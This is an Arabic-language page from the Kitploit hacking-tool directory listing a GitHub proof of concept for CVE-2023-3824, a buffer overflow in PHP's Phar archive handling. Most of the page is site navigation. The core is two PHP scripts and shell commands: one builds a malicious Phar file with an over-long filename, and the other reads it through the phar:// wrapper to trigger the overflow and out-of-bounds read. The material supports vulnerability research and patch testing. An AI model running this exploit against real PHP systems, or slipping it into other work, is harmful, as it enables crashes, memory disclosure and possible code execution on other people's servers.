Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-3824 — ثغرة في ملفات PHP Phar، ناتجة عن تجاوز سعة المخزن المؤقت، تنشأ من عدم كفاية التحقق من طول أسماء الملفات داخل أرشيف Phar. يمكن للمهاجمين الخبيثين إنشاء ملفات Phar بأسماء ملفات طويلة، مما يؤدي إلى تجاوز سعة المخزن المؤقت واحتمال تنفيذ كود خبيث أو تسريب البيانات. يمكن استغلال هذه الثغرة لتنفيذ كود CVE-2023-3824 | Kitploit
أدوات/GitHubGitHub/jhonnybonny/cve-2023-3824
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
3246منذ 2 سنواتلم تتم المراجعة بعد

حول

ثغرة في ملفات PHP Phar، ناتجة عن تجاوز سعة المخزن المؤقت، تنشأ من عدم كفاية التحقق من طول أسماء الملفات داخل أرشيف Phar. يمكن للمهاجمين الخبيثين إنشاء ملفات Phar بأسماء ملفات طويلة، مما يؤدي إلى تجاوز سعة المخزن المؤقت واحتمال تنفيذ كود خبيث أو تسريب البيانات. يمكن استغلال هذه الثغرة لتنفيذ كود CVE-2023-3824

مشاركة

إثبات المفهوم لملف Phar ضار في PHP (CVE-2023-3824)

الوصف

يوضح هذا الإثبات العملي (PoC) كيفية إنشاء ملف Phar ضار في PHP وبدء ثغرة تجاوز السعة المخزنية.

الاستخدام

إنشاء ملف Phar الضار

  1. أنشئ ملف PHP جديد (مثل create_phar.php) وأضف الكود التالي:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

نفذ النص PHP لإنشاء ملف Phar الضار: انسخ الكود

root@kitploit:~
php create_phar.php

تشغيل تجاوز السعة المخزنية

أنشئ ملف PHP آخر (مثل trigger_overflow.php) وأضف الكود التالي:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

نفذ النص PHP لتشغيل تجاوز السعة المخزنية: انسخ الكود

root@kitploit:~
php trigger_overflow.php

سيقوم البيان var_dump($x) بإخراج نتيجة عملية تجاوز السعة المخزنية والقراءة الزائدة.

تنزيل الأداة